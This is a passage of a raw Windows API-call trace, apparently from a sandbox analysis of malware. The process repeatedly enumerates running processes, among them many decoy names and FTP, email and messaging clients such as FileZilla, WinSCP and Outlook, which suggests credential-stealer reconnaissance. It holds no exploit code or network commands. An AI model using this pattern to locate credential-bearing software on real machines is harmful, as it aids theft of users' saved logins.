cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.569] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.572] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0173.574] CloseHandle (hObject=0xb2c) returned 1 [0173.575] Sleep (dwMilliseconds=0x64) [0173.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0173.718] Process32First (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.720] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.723] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.725] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.728] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.730] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.733] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.777] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.780] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.783] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.785] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.787] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.789] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.791] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.793] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.794] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.796] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.798] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.799] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.802] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.804] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0173.806] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.807] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0173.809] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.813] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0173.840] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0173.842] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0173.845] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0173.848] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0173.851] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.853] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.856] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.859] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0173.861] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.863] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.866] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.867] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.869] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.873] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0173.961] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0173.964] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0173.967] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0173.969] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0173.972] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0173.975] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0173.977] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0173.979] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0173.989] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0173.993] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0173.997] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0173.999] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0174.002] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0174.006] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0174.008] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0174.010] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0174.013] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0174.015] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0174.018] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0174.021] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0174.024] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0174.026] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0174.029] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0174.033] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0174.036] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0174.039] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0174.041] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0174.047] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0174.050] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0174.052] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0174.055] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0174.059] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0174.061] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0174.064] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0174.067] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0174.070] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0174.073] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0174.075] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0174.078] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0174.081] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0174.090] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0174.093] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0174.096] Process32Next (in: hSnapshot=0x19c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, 